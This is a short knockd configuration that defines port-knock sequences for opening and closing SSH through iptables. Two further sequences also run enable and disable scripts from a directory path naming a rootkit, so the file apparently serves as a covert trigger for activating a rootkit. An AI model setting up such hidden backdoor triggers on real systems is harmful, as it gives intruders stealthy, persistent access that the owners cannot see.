[options]
      logfile = /var/log/knockd.log

[openSSH]
      sequence    = 7000,8000,9000
      seq_timeout = 5
      command     = /sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT
      tcpflags    = syn

[closeSSH]
      sequence    = 9000,8000,7000
      seq_timeout = 5
      command     = /sbin/iptables -D INPUT -p tcp --dport 22 -j ACCEPT
      tcpflags    = syn


[enablePersonality]
      sequence    = 7001,8001,9001
      seq_timeout = 5
      command     = /sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT && /home/kit/knock/rootkit/src/script/enable.sh
      tcpflags    = syn

[disablePersonality]
      sequence    = 9001,8001,7001
      seq_timeout = 5
      command     = /sbin/iptables -D INPUT -p tcp --dport 22 -j ACCEPT && /home/kit/knock/rootkit/src/script/disable.sh
      tcpflags    = syn